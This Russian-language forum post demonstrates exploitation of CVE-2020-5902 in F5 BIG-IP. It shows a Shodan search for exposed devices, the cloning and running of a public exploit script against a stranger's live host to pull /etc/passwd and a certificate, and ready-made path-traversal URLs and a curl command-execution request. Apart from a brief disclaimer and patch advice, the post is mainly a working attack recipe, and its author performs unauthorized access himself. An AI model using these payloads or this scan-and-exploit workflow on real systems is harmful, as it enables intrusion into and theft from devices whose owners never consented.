Эксплуатация CVE-2020-5902
Life-Hack [Жизнь-Взлом]/ХакингПриветствую Уважаемых Форумчан,Друзей и Читателей Форума.
Сегодня поговорим про уязвимость CVE-2020-5902.
Найдём уязвимую машину и проэксплуатируем данную уязвимость на конкретном примере. Михаил Ключников обнаружил свежую уязвимость, которая сразу же была отмечена как критическая.
Был присвоен идентификатор CVE-2020-5902 и по шкале CVSS, уязвимость соответствует наивысшему уровню опасности.
Затрагивает она интерфейс контроллера приложений BIG-IP.
Атака злоумышленником на уязвимый контроллер может быть выполнена удалённо и от имени неавторизованного юзера.
Выполнение произвольного кода приводит к вероятной раскрутке LFI и RCE
Последнее легко реализуется,если компоненты системы настроены некорректно и выходят за пределы каталога. А c помощью произвольного кода java можно создавать и удалять файлы на хосте.
Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.
Запрещено применять рассматриваемые методики атак в незаконных целях.
В новостях корпорация F5 отчиталась,что уязвимость исправлена успешно.
Но это зависит не только от корпорации,а больше от владельцев ресурсов и админов.
Для проверки попробуем найти хост с помощью поисковика Shodan.
Делаем запрос и получаем список подходящих машин.
Админы некоторых уже прислушались к рекомендациям. Проверить можно по IP-адресу с использованием различных скриптов. Но я решил быстрее сделать это на он-лайн чекере.
Как видим, хост уязвим. Взглянем на панель BIG-IP, всё на месте.
Если мы просто применим какой-либо обычный скрипт,то он покажет,что машина не подвержена данной уязвимости. Некоторые отработают,но им требуется указать директорию. Народ поторопился с их созданием и такие скрипты ещё где-то надо допиливать.
Из всех подходящих скриптов,которые позволяют эксплуатировать такую уязвимость "на лету"-F5 BIG-IP. Специалист John Jefferson Li с Филиппин написал несколько часов назад отличный bash-скрипт. Здесь скрипту нужен всего лишь IP адрес , а директории он сам распознает.
Установка скрипта F5BIG-IP
Код:
# git clone https://github.com/itsjeffersonli/CVE-2020-5902.git # cd CVE-2020-5902/ # chmod +x CVE-2020-5902.sh # ./CVE-2020-5902.sh
Указали IP и далее предлагается сразу же эксплуатация. Решаем как будем эксплуатировать ,через LFI или RCE
RCE проводить не буду, т.к. вредить ресурсу не станем и никаких изменений с файлами тоже не будем делать. Скрипт спросит какие файлы ему постараться вывести.
Если задать /etc/passwd, то получаем этот файл.
Можно выдернуть у цели и сертификат.
Эксплуатировать данную уязвимость можно и классическим способом,с помощью Burpsuite.
Для этого перехватываем запрос до директории админки /login.jsp
Изменяем запрос и проводим атаку Directory Traversal:
Код:
https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
Для RCE используется обычно утилита Curl:
Код:
curl -v -k 'https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Выводим список машин , входящих в сеть ресурса .
И аналогично получаем файл /etc/passwd
Защита и заключение.
Только обновление до последних версий BIG-IP. Использовать BIG-IP Virtual Edition 14.1.2.6;15.1.0.4;13.1.3.4. А лучше выполнить все рекомендации безопасности отсюда.
Несмотря на усилия корпорации F5,которая быстро отреагировала на выявленную уязвимость и приняла меры, много машин по-прежнему остаются наедине с такой бедой.
Всех Благодарю за внимание и до новых встреч.